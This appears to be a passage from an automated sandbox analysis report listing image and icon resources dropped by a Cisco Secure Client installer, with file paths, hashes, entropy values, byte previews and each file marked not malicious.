                                                                                                                                      Preview:.PNG........IHDR...............&.....pHYs...#...#.x.?v.. .IDATx..}.x.....Q?.....!.._..t]..$.*`W@..Z.......]..h..B.n...j/.R.~..P`..+*A..-J...o..u....9..3s...7....+y.3.<.<..%....5.....Sv.o?9p.....=..t....~./,]ID.>....O.p9.T.6.I/*.......s'O...}.....QkS].y36."..P.../f...E..Y....n.h.K.uN2..*zn.....M...Y.n?.....V(G......o6.....n.G6........O~ai...hn+....s..3...3...........X0.t..o....Gr.w...../{.l....3"..d#s..]..S^...x.7\.xtk7.k....f..8.....MMM.......At...'.t1......c}...k.....U....b]dW.=.k.=.o..a...o....v &T....-j....q.o.5=....w.2.v.&U.37F..WG...vn....l......S...g`'./.|Z....lSP.....ji...N.<..6f.u^.v..l;)F...$.....E81..F7.i..h.+.2~3.SBD..w.q/...z+.?..........^.S.(.3f..N.......km..v....#.H7..S&0J/._XZ@D...t2a.........tD..#..]"s...J....|M....?..tLH....&.8.|t.H.\/..O|C....":..E)Q.R.....<?...M.}............1..3.....]5.w+....W.>7. .j..>..,b8..c..v.E..........;.\.:];.I.S..CE...c..._...........r./e..C...t..7.yLJ..{_.z........W<E;f^g....O2..>|.n...o..7Q.d.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\l2_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):10239
                                                                                                                                      Entropy (8bit):7.950564187811269
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:uTeKIu+Nxu1/eEefaoIgGSw78i5GJssnezz3Gu5cMrvF6AO:uTeg+NkdeCodGSiV3dcI96AO
                                                                                                                                      MD5:7DADB01AC22B7AB6F313726AD5977675
                                                                                                                                      SHA1:274554CDEB3971D3A9250AA0A7597F8B41D17000
                                                                                                                                      SHA-256:EBBA9313774314E18ABB4F4342B1C0C93DF22DD45146C6E84A08EB39BD419825
                                                                                                                                      SHA-512:C77FA7F8791A4852DBA2C9402D705E6C4CDB92DAAF71CD5F46EA8AD6EA35E41D4CFF42296C2F08133A82AE1F31DCA05C61B29AC291F85BBE4C7FDF088A4F0866
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U.._l.eK.ImJ\.7`vV...R..t..P3.L...N.DZ..R........!8...`..$.dqj..j..-.a.C.....+...WB)S.tc..N.j..xOs.>...|....UT7....s.......c.!.Q_j.!.......rw..5.....E}.q...R..V.N'Na..@...-...y.`......h..)LS.........J!.....V<(Z9...8E:...-.B.'z.?..1.>X../.k.W(Z9C:.y.=.0.s._.K..#...-........_.0..1...P..C.{-R.Z.~>j.O.X..1...@.r.YJ.....Q.._/......7M..o.4|....J&.t.w. .9sV.|..kz^?5.....K.....D......Q.fd..VFIJ. >..;..".$EG'>I...m..=....E...<...?..e..V..S.|1.3s........K@. ^.w...../`..Bf..V......\....f.w.............).'..!G!`...8......r..!)X5..l.....N%.>.T.x.mq..).E$bp\.....>&.E+A*\..Z.?8.E.g.93.....v.T...I...XGW.'j5rL...WBP..@.)l.....=..=......{q...|.Gtv.Vkr..k7s_.C.............i.l....B.#./.*`.....1.(Z1 .jK...tT....._.%.D....W.P.".....z..X.^..7:.z..W..UB...V.."V~..."..!.s/..9.*.G.W.P.j.Z...B...5K..9.\.........}.P...b50T...j.f.U1.....s..}.._.J<^.s...V.d.U..,k VpU..............M..I.u.......%

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\l2_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2274
                                                                                                                                      Entropy (8bit):7.88487369762579
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                      MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                      SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                      SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                      SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx...LUe....]i...%L.......^....#.J[6...[.Q.....2.0.p...sT...o.c.n..dE[N/E.9..H..k.....{..s.....wc.{.=?..}..}..}.3....jK#.d"......&"......ug.|b......".&.,"J..[.x..&.J$s....]=t..*........TMDU.G.5=._.@&...........c[|V..v...|3..3.......,...`vp0.@.H...e.`V..`]..g.^sN........ o0..-.gQFz........J..+j.*h@&...T@D...k.zwl1Z.t.......r.U.. n5..5p..{..f1r.E.=P"\..6.jM..2Ym.....u.V..=[)&:*."i...^.{.(U.:C.V..uMjo........N.DG..9.......?.4,....)cy*..H5?]..s..5.lm.w:TAR...)M...YV.GK...<.....|.".p.%.....f.u5............Rr..y.}..DL*Sr.".z...w....n..d...8B.@...xmU.4+...J.n............(KQ~...,.L....>..LV..9....[..../.G.T..(..>4(7...xGw........h.....X.....{..V-@B.../..y..1..W.d. nn...&....~...*S`....k...@k{.w.dP-.n....Z.(...=.:...N..#\......-~......0..;...K. .'....;..|J.n.d.t...A_O)d..g r...w-...e........@5.d.v...........e.y-....3\.......H..[.g.roI.=.(B...\.d.....jh..K..S.].......Xf...jC....ol...2

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\menu.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 24 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):291
                                                                                                                                      Entropy (8bit):6.344520469543007
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:6v/lhPqJsXTSgECFg9ZA3teRaCCgqMtK+ywsl3DF1bp:6v/7hXeBOgIYawtvyx3/1
                                                                                                                                      MD5:DA395D5499E3403BC29899F8ED09E0F4
                                                                                                                                      SHA1:A6806BF5F7B2B0E1DDB705E2DBDF761E704738CD
                                                                                                                                      SHA-256:E72F87D5171DCD847C6A5994471B97339C4595E0C55591B1641227B56DB02041
                                                                                                                                      SHA-512:FEF71C2D806F506CD67B3338484C0B100989135012E72B321287C662AD65BD9120B210270D0B023F76FCAFD23237E9EDEDD5987E6B4D3731B9776B2EB338FE18
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR..............}\.....gAMA......a.....pHYs...........~.....tIME........w.e....tEXtComment.Created with GIMPW.......tEXtSoftware.Paint.NET v3.5.100.r....gIDATHKc`...!@........0.a|Rh..r....0E0>)4.}=..t.....0W....x}......a.`|R...dTw..........B.u..-.z...8.C..^...Y.......IEND.B`.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\mftogglebtn-down-solid.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.020486157649533
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNAG+ojoyMmcI1VYj41jCw1jaPl3VYjJoUHH3yG3:g/6G6GknA9Wg2O0y/c0CKum23CuUHiWV
                                                                                                                                      MD5:F999F81B91475C98DE33D66E186DF2CA
                                                                                                                                      SHA1:397B889C5AA95A25FFBD128656BE5D91A71F3275
                                                                                                                                      SHA-256:F807E26DA3A4BBFBD9552D2D50FB0F5FC28AAC46635470E3F834C2042C05310B
                                                                                                                                      SHA-512:2A43CB4EFC414F8FAE4EA173FB53CF2819975C76170DCEE4A995B3A74786C167C26DF258E1E589ECD92DECB999683EA38C6C4882CC2E299313C9357080521844
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T17:58:51-04:00" xmp:MetadataDate="2018-10-19T17:58:51-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c57f0649-d423-40eb-938e-eeff8347c1a5" xmpMM:DocumentID="xmp.did:c57f0649-d423-40eb-938e-eeff8347c1a5"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\mftogglebtn-down.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1601
                                                                                                                                      Entropy (8bit):6.01754566314674
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:g/6G6GknA9Wg2A/c0glTl3clp3glfHiucV:gSuknmWg2A/qlTlslelfHiucV
                                                                                                                                      MD5:1F1425233D56C7381E8A1B9544656A3F
                                                                                                                                      SHA1:13DA3D280A4561F9018BFDF2C55396862B42C3BE
                                                                                                                                      SHA-256:FD348FEFE62E962AD34D03B3639E850AAEDCEAD2585311F8F665EFFF9319A6BA
                                                                                                                                      SHA-512:ACEC3FD68209F5AF45FC0736ECD9DB2441E69BD0A0DC43C45CEF2529BDC14B4D4A41696C0BED6E11876F066E137D29E270866FE86F3A20FC4CB9F09BA0EFE0AC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:27:50-04:00" xmp:ModifyDate="2018-10-19T18:00:07-04:00" xmp:MetadataDate="2018-10-19T18:00:07-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:c52f4fb1-426f-49c5-a2f3-2e915bfa2393" xmpMM:DocumentID="xmp.did:c52f4fb1-426f-49c5-a2f3-2e915bfa2393"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\mftogglebtn.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1577
                                                                                                                                      Entropy (8bit):5.942243839150427
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:HA/6I1hxWwUyl3ZknA9VYVhEfNA6h+REMmcI1VCnw7Pl3Vv7aHH3yGNbBg:g/6G6GknA9Wg26x/c0eG3tmHiGg
                                                                                                                                      MD5:8675E6CF868FCE7270D170D83CE58757
                                                                                                                                      SHA1:B08567ACEF2380521759E4A1C12B1C9FE657ABED
                                                                                                                                      SHA-256:593A68E8FC7ADF787E5728D044AC71D4A9BEC6E4A6BF15895ABC8C4869F33625
                                                                                                                                      SHA-512:6480B3304656ECA345326A96FEF93B653B9F40550E5B0D14498B2670BAFB497E78A2517911F8E791E1DEC3C9A3070CB4212DB727FBE3FC648F6100E5EF349B2F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...,...(.......P.....pHYs................:iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" tiff:Orientation="1" xmp:CreateDate="2018-10-09T14:31:46-04:00" xmp:ModifyDate="2018-10-19T17:56:14-04:00" xmp:MetadataDate="2018-10-19T17:56:14-04:00" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:1181fb18-be64-4155-ab97-06d5464c99e6" xmpMM:DocumentID="xmp.did:1181fb18-be64-4155-ab97-06d5464c99e6"

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\nac_logo.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):12068
                                                                                                                                      Entropy (8bit):7.961027992023309
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                      MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                      SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                      SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                      SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx...l....q.a_...n`.p.l..].!.X.cmb.T{W/8.6..6......%".T..yO)"...e!..5....[.+.;..y....RX..s..@[.&.6..j...1..sf..93..I.....;.......(F...-5>P....(.`..T|..P...}.D.H....R.L..8.....1...$.....A.X?.sb..;@...h9.wJ.;._.)eM........Ss...........4..o.............P[j.E.~.TE..0.......ro../.PA..SjK..8A.Zs..eE..X.!...<Y..Z.rr\J.}w.....?e......`..X.c. %......p.z4M7.PC........&.6.......".1c..>...^.d..S.9../s..O... ..4.j.]S<.>u..v.d6..1..S.@.N.y..=...;...9v..=...wB..Y...%.D..$..b...6u....wM...#......w..-.g...F!...he.O..r.2.....Qj..{D.\.we}.....D. ...(...$Z...?.U......r3k.o.'R.M........s....W..h.Hm.q).U.Z...}w....;...'v..I...QO.....Q1k:.h%...Ws...UA....!7....w.f].G..X...w..^...VBT$..pQ.,`-Ms.0.H.C.......d .2....\."...."G.=...{:Xgw..Rj...&.(.e..-C..+.(.)......a...n...'.I..@...8b.'.v."..r.BF./.....`...1.$Z.T$.WE.Y5sWes.:......}:./.y.DK..R.j.B.....YQ..X d|a.^.......F.D+.|..(.....KZ....(.,8~...,".y.H=.! ....

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\nac_logo_72.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2531
                                                                                                                                      Entropy (8bit):7.8827223365027725
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                      MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                      SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                      SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                      SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\ol.E....)....{.*i#.A .lbi..~.E.......M!..E.M..m.......L../=...TJ...4..@9.....O.E...fz.{..3.G5.%....y.y.....=.a..e.D4.....|.C7....3x..w.....NP(ZVHD5DTMD....sg....E.......+..........ImD.:...3...BP(Z....).(.4A..`.....l..AT.....K@..$Y.~..+A..5...H.\4..V/.Z.'.]{..P.."._...'Q..d%.....j.\...."..E..nS..+Q....e0.."*.1o...-....d{."..i.`.....$.......q...i...Q.6.R...V.j..A.h...>h..'.....)?/.@$.q..u.y'.....6-..wv{.Q../..e/..7.y..wl~.^....;6tWHp..TY..JK..........G/...{"..A.....E9...i..~.....Z@.....zs..t.&;.=..M..C....3)7..z.m.|.'.N.{iiP&.9...m=....L.....ar5.O...&e.} S..~j......>....8..=0v. ..f).#....UC...9..Q....}h8I.R.HI..s....F.6.....v..O^.EhSP.,R&!....N.. ....{...s..$L.....I2... ........C.......Dt........2BV).0.#H.[....@..M.jO:....(S/.v.f.A..bo.t....|M..Z.2BVijk..'.$...n...BP.r..<@KB*.R.....A..6..2.d...:..Y5..F..0...b.;.D....p...=..;v.hgK..o.Iu.... ..R.U.....c...9....xi.TW..`.....~...N.".A...

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\neutral.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):3.4732129504366194
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                      MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                      SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                      SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                      SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P...........................@.......................................................................................`...................................................@...................................................................@................z]J.X5..M'..M'..M'..M'..X5...kY....................0.................................................................xh.M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..X5.................p........................................................X5..M'..M'..z]J.................................X5..M'..M'..X5...........................................................xh.M'..M'..z]J.............................................M'..M'..M'..M'...................................................xh.M'..M'......................................................M'..M'..z]J.M'..M'.............p.......................P........M'..M'

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\noncompliant.ico (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):5430
                                                                                                                                      Entropy (8bit):4.010961844615086
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                      MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                      SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                      SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                      SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................@................................IA.P..s...s...s...s...s...s...s@............................................................................................b[....y.&...,...0 ..0 ..,...&.....y...s...s......................................................xh.cB+.M'..M'..M'..M'..J&..$.`.".../...0 ..0 ..0 ..0 ..0 ..0 ../...".....s...s.........................................z]J.M'..M'..M'..M'..z]J.z]J.z]J.+.S."...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..".....s........................0..........w.M'..M'..X5...xh.......................y./...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ../.....y...s@........................z]J.M'..M'...xh.........................qj..&...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..&.....s.....................z]J.M'..X5.................................8/..,...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..,.....s...................w.M'..X5

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\pinned.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3683
                                                                                                                                      Entropy (8bit):7.90204028759812
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTuU1G4X0vy:TSDS0tKg9E05TuGG4k6
                                                                                                                                      MD5:4D8816B117672123F84ECD051877A37D
                                                                                                                                      SHA1:C9983DE5E4DD52660A109C418DBDA7B7F202E2E8
                                                                                                                                      SHA-256:3D2A9058537240F9131F6A8D083A6723A0D45E31BF2BBA4EA761DE23948C8209
                                                                                                                                      SHA-512:63395803D1BED8B33E1854D6EC5EEF2322FFE69B5150CF414692D7AE8003ABA601FB283C8CB661ED4AD633B4ACF945AADC579A84910441963F8EE801D0CEB447
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\pinned_button.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4455
                                                                                                                                      Entropy (8bit):7.908038022091361
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTIaLT1ZWqwPFR34mH:TSDS0tKg9E05TBZWqqPH
                                                                                                                                      MD5:2E3C536FBC9DDA9D0DA7DD408FA3D69B
                                                                                                                                      SHA1:4056553645ACFD51D5BB1E74623ED9938C0F5717
                                                                                                                                      SHA-256:D86F0CEDDF46C275DF0FC6CF0FE70852DD270D0BC35355CC6B30CE7DDD6EC2B7
                                                                                                                                      SHA-512:AB3237097BBA665CC1B22F4A4C280C6141E8266EA9D4A569C3B53D4401E00F4E1E0F7944A172C16CDD455AF8EAF3EAA9FC43A08EFDFE7844689BFC7B4CB870F1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\res\status_ico_attention.png (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):26674
                                                                                                                                      Entropy (8bit):7.935979285003627
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:YFyemvD4Gm3D6kkgmo+C24RkZErZWiTVCbFk:YryD4G+Dcgmo+C9kZsZWpFk
                                                                                                                                      MD5:B1655EC01B232A1A42E43F950321285A
                                                                                                                                      SHA1:F34C1F228C66BF4ED1B0E9901D3284EBD7A01600
                                                                                                                                      SHA-256:9E2447F1B7B4A3404C8D3588DAB59CF51635049BE4F1FC0D1BDEE77DEFFC5B47
